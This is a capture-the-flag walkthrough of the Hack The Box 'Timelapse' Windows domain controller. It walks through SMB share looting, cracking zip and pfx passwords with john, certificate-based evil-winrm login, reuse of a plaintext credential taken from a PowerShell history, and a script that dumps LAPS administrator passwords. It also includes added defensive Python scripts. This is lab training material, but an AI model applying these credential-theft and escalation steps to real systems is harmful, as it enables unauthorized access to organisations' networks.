Hack The Box - Timelapse Walkthrough
Welcome back! Today we are going to solve the Timelapse machine from Hack The Box. Timelapse is an easy box which focuses on accessible SMB shares and a lot of hash cracking to get the initial foothold. We then find configuration files that allow us to log in to the system as the administrator user.
Foothold
Let's start off with a basic nmap scan. We use -Pn to skip host discovery, -sC to run the default scripts against the discovered services, -sV to enumerate service versions and -oN to write the output in Nmap's normal format.
nmap -Pn -sC -sV -oN nmap/initial timelapse.htb
Which shows us the following results:
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-01 16:07:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m06s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-04-01T16:07:28
|_  start_date: N/A
We find the domain (timelapse.htb) and the host (DC01). We also see that DNS, Kerberos, LDAP and LDAPS are open, which indicates that we are dealing with a domain controller. Before we dig into the results and start enumerating, we first start a more elaborate scan of all ports in the background, using the -p- flag to specify all ports.
nmap -Pn -sC -sV -p- -oN nmap/all_ports timelapse.htb
Let's start off by enumerating RPC using rpcdump.py.
rpcdump.py timelapse.htb
rpcdump.py found 398 endpoints, but none of them gave us useful information for obtaining a foothold on the system. We continue with SMB and run nullinux.py to see if we can find any interesting information over ports 139/445.
python3 nullinux/nullinux.py timelapse.htb
But again, no luck: we receive "access denied" on most checks. All we find is the domain name "TIMELAPSE" and the domain SID "S-1-5-21-671920749-559770252-3318990721".
We try to enumerate users through nmap's krb5-enum-users script, since we know the domain:
nmap -Pn --script krb5-enum-users --script-args krb5-enum-users.realm="timelapse" -p 88 timelapse.htb
Which shows us the guest and administrator users:
PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     guest@timelapse
|_    administrator@timelapse
Which isn't of much use to us.
Next, we try to connect over LDAP to extract data. For this we write a simple python3 script that connects to LDAPS (port 636) with an anonymous bind:
import ldap3
from ldap3.core.exceptions import LDAPException

# get_info=ALL asks the server for its RootDSE and schema after binding
server = ldap3.Server("timelapse.htb", get_info=ldap3.ALL, port=636, use_ssl=True)
connection = ldap3.Connection(server)  # no credentials: anonymous bind
try:
    connection.bind()
    print(server.info)  # RootDSE details, if the server hands them out
except LDAPException as e:
    print(f"LDAP connection failed: {e}")
Which returns a "Connection reset by peer" error, meaning we can't talk to LDAP without authentication.
Let's try to enumerate SMB now, using guest access. To do this, we specify the % sign as the username:
smbmap -H timelapse.htb -u %
Which returns several default shares, but also one interesting read-only share named "Shares":
[+] Guest session   IP: timelapse.htb:445   Name: unknown
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
        NETLOGON                                                NO ACCESS
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS
We connect to the share using smbclient, and download all files that are available to us:
smbclient //timelapse.htb/Shares -N   # -N: guest session, no password prompt
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
In the /dev/ directory of the share we find a winrm_backup.zip that is password protected. We use zip2john to convert the zip file into a hash so that we can crack it with john.
zip2john winrm_backup.zip > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash
We crack the password and extract a .pfx file from the archive. This .pfx file is also password protected, so we use pfx2john to convert it into a hash and crack that as well.
pfx2john legacyy_dev_auth.pfx > pfx_hash

john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash
After two minutes we crack the .pfx password. Opening the .pfx file (double-clicking it) shows an "identity:Legacyy" entry, indicating that legacyy is a potential username.
We use openssl to extract the private key from the .pfx file:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
We now have a passphrase-protected private key. We decrypt it using the following command:
openssl rsa -in private.key -out decrypted_private.key
We also use openssl to extract the certificate from the .pfx file and convert it to DER:
# extract the client certificate as PEM (.crt), without the private key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt

# convert the PEM certificate to DER (.cer)
openssl x509 -inform pem -in cert.crt -outform der -out cert.cer
We now have a potential username (legacyy), the client certificate and the decrypted private key. We use evil-winrm to connect to the box with certificate authentication over SSL:
evil-winrm -i timelapse.htb -k decrypted_private.key -c cert.cer -S
We navigate to the desktop and find user.txt:
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


    Directory: C:\Users\legacyy\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          4/1/2022   9:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami
timelapse\legacyy
Privilege Escalation
We upload WinPEAS and run it. WinPEAS shows us that our user has a PowerShell history file at "C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt", which contains the following:
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '[...REDACTED...]' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
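History files like this are exactly what a defender should be hunting for on endpoints. The following Python script is an added example, not part of the original walkthrough: it scans a PSReadLine history for the three patterns seen above (a literal secret passed to ConvertTo-SecureString -AsPlainText, a PSCredential built from a literal username, and -Skip*Check session options that disable TLS validation). The sample history is a constructed copy of the one above with the password redacted.

```python
import re

# Constructed sample mirroring the ConsoleHost_history.txt shown above (not the real file).
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '[...REDACTED...]' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# Detection rules: (name, regex). PowerShell is case-insensitive, so the patterns are too.
RULES = [
    ("plaintext-secret",       # a literal secret turned into a SecureString
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>.*?)\1.*-AsPlainText", re.I)),
    ("credential-object",      # a PSCredential built from a literal username
     re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)),
    ("tls-checks-disabled",    # session options that switch off certificate validation
     re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
]

def scan_history(text):
    """Return (line_no, rule, detail) for every line that leaks or weakens a credential.
    The secret itself is never copied into the finding, only its length."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            if name == "plaintext-secret":
                detail = f"{len(m.group('secret'))}-char literal"
            elif name == "credential-object":
                detail = m.group("user")
            else:
                detail = ",".join(sorted({x.group(0) for x in rx.finditer(line)}))
            findings.append((no, name, detail))
    return findings

if __name__ == "__main__":
    for no, rule, detail in scan_history(SAMPLE_HISTORY):
        print(f"line {no}: {rule} ({detail})")
```

To check a real history file, read its contents and pass them to scan_history; the findings give the line number and the kind of exposure without repeating the secret.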
We use evil-winrm to set up another session with the new credentials that we found. As the password contains a $, which the shell would otherwise treat as the start of a variable inside double quotes, we escape it with a backslash before logging in:
evil-winrm -i timelapse.htb -u "svc_deploy" -p "xxR\$Q62^12xxxxKWaxxxV" -P 5986 -S
We navigate through the filesystem and find that LAPS is installed. Knowing this, we use a simple PowerShell script that reads the LAPS password attributes (ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime) of every computer object:
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
We run the script and find administrator credentials:
.\password_dump.ps1


Name  DnsHostName        ms-Mcs-AdmPwd    ms-Mcs-AdmPwdExpirationTime
----  -----------        -------------    ---------------------------
WEB01
DEV01
DB01
DC01  dc01.timelapse.htb [...REDACTED...] 132937346648463515
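The ms-Mcs-AdmPwdExpirationTime column is a Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC), which is why it looks like an opaque integer. The following Python script is an added example, not part of the original walkthrough: it parses a constructed copy of the table above, decodes the expiration timestamp and reports, for a given clock value, which computers returned a LAPS password and whether that password is still within its rotation window.

```python
from datetime import datetime, timedelta, timezone

# Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
# LAPS stores ms-Mcs-AdmPwdExpirationTime in this format.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ticks):
    """Convert a FILETIME integer to an aware UTC datetime (sub-microsecond part is dropped)."""
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)

def filetime_to_iso(ticks):
    return filetime_to_datetime(ticks).strftime("%Y-%m-%dT%H:%M:%SZ")

# Constructed copy of the Format-Table output from the walkthrough (password redacted).
SAMPLE_TABLE = """Name  DnsHostName        ms-Mcs-AdmPwd    ms-Mcs-AdmPwdExpirationTime
----  -----------        -------------    ---------------------------
WEB01
DEV01
DB01
DC01  dc01.timelapse.htb [...REDACTED...] 132937346648463515
"""

def parse_laps_table(text):
    """Return {computer name: expiration ticks or None}. None means the query returned no
    LAPS value for that computer (not LAPS-managed, or the caller lacks read rights)."""
    rows = {}
    for line in text.splitlines()[2:]:          # skip the header and its underline
        parts = line.split()
        if not parts:
            continue
        rows[parts[0]] = int(parts[3]) if len(parts) >= 4 else None
    return rows

def laps_report(text, now_ticks):
    """Classify each computer relative to the clock value now_ticks (a FILETIME):
    'no-value', 'expired' (rotation overdue) or 'valid', plus the ISO expiry if known."""
    report = {}
    for name, expiry in parse_laps_table(text).items():
        if expiry is None:
            report[name] = ("no-value", None)
        elif expiry <= now_ticks:
            report[name] = ("expired", filetime_to_iso(expiry))
        else:
            report[name] = ("valid", filetime_to_iso(expiry))
    return report

if __name__ == "__main__":
    # 132933028400000000 is the DC clock from the nmap scan (2022-04-01T16:07:20Z) as FILETIME.
    for name, (status, expiry) in laps_report(SAMPLE_TABLE, 132933028400000000).items():
        print(f"{name}: {status} {expiry or ''}")
```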
We use these credentials to log on to the box as the administrator user through evil-winrm, find root.txt, and thereby complete the box:
*Evil-WinRM* PS C:\Users\TRX> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\TRX> dir Desktop


    Directory: C:\Users\TRX\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          4/1/2022   9:04 AM             34 root.txt
I hope this walkthrough has been useful to you and taught you a thing or two. Thanks for reading, and see you in my next walkthrough!